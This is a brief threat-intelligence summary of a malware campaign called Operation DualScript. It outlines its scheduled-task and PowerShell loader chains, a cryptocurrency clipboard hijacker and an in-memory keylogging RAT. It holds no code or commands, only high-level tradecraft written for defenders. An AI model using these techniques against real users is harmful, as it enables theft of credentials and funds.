Operation DualScript is a sophisticated multi-stage malware campaign targeting cryptocurrency and financial activities. It utilizes Windows Scheduled Tasks, VBScript launchers, and PowerShell execution to maintain persistence while minimizing disk artifacts. The attack operates through two parallel chains: a web-based PowerShell loader deploying a cryptocurrency clipboard hijacker, and a secondary chain executing the RetroRAT implant in memory. RetroRAT monitors user activity, captures keystrokes, and tracks interactions with financial services to harvest sensitive information. The malware employs various anti-analysis techniques and establishes a command-and-control channel for remote access and data exfiltration. This campaign highlights the growing abuse of trusted system utilities and in-memory execution techniques to evade traditional detection mechanisms.